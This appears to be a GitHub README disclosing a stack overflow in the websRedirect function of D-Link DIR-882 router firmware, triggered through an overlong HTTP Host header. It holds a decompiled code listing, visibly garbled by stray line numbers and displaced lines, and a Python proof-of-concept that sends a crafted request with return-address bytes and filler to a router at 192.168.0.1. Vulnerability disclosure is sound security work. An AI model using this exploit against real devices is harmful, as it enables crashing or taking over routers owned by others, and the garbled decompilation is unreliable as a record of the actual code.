

adme.md

D-Link DIR-882(1.10B02, 1.20B06) has a Stack Overflow Vulnerability

Product

- 1. product information: http://support.dlink.com.cn:9000/ProductInfo.aspx?m=DIR-882
- 2. firmware download: http://support.dlink.com.cn:9000/download.ashx?file=6573

Affected version

1.10B02, 1.20B06

Vulnerability

The vulnerability exists in the websRedirect function in the prog.cgi Web server.

```
1 int fastcall websRedirect(int *a1, const char *a2)
   2 {
   3
      int result; // $v0
      const char *v3; // [sp+20h] [-2Ch]
   4
      void *v4; // [sp+24h] [-28h]
   5
     const char *v5; // [sp+30h] [-1Ch] BYREF
   6
   7
      char v6[24]; // [sp+34h] [-18h] BYREF
     const char *v8; // [sp+54h] [+8h]
   8
   9
10
      v8 = a2;
      ++dword_4EB914;
11
12
      v5 = 0;
      if ( strstr(a2, "http://") )
13
• 14
       goto LABEL 15;
15
      if ( *v8 == 47 )
16
       ++v8;
• 17
      sub_419710((int)a1, "HTTPS", a1[87]);
      v3 = "http://%s/%s";
18
• 19
      if ( a1[87] && !strcmp(a1[87], "on") )
20
        v3 = "https://%s/%s";
      v4 = sub_419710((int)a1, "HTTP_HOST", a1[60]);
21
      if (!strchr(a1[59], 91) || inet_pton(10, v4, v6) <= 0)
22
  23
24
        v4 = sub_419710((int)a1, "SERVER_NAME", a1[59]);
  25 LABEL 13:
      fmtAlloc(&v5, 4176, v3, v4, v8);
26
27
        goto LABEL 14;
  28
29
      v3 = \text{"http://[%s]/%s"};
     if ( !a1[87] || strcmp(a1[87], "on") )
9 30
31
        goto LABEL 13;
     fmtAlloc(&v5, 4176, "https://[%s]/%s", v4, v8);
  33 LABEL 14:
9 34
     v8 = v5;
  35 LABEL_15:
     websWrite(a1, "Location: %s\r\n", v8);
36
37
      result = (int)v5;
38
     if ( v5 )
39
        result = free(v5);
40
      return result;
• 41 }
```

In websRedirect function, v4 is controllable and will be passed into the v5 . A piece of code do copy Host header string to stack with no length limit, it will case a stack overflow vulnerability.

PoC

```
import socket
  p = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  p.connect(("192.168.0.1" , 80))
  shellcode = "A"*0x3000
  rn = "\r\n"
  strptr = "\x60\x70\xff\x7f"
  padding = "\x00\x00\x00\x00"
  payload = "GET /sharefile?test=A" + "HTTP/1.1" + rn
  payload += "Host: " + "A"*0x70 + strptr*2 + "A"*0x24 + "\xb8\xfe\x48" + rn
  payload += "User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:59.0) Gecko/20100101 Firefox/59.0" + rn
  payload += "Accept: text/html, application/xhtml+xml, application/xml; q=0.9, */*; q=0.8" + rn
  payload += "Accept-Language: en-US,en;q=0.5" + rn
  payload += "Accept-Encoding: gzip, deflate" + rn
  payload += "Cookie: curShow=; ac_login_info=passwork; test=A" + padding*0x200 + shellcode + padding*0x4000 + rn
  payload += "Connection: close" + rn
  payload += "Upgrade-Insecure-Requests: 1" + rn
  payload += rn
  p.send(payload)
  print p.recv(4096)
© 2022 GitHub, Inc.
```

Terms

Privacy

Security

Status

Docs

Contact GitHub

Pricing

API

Training

Blog

About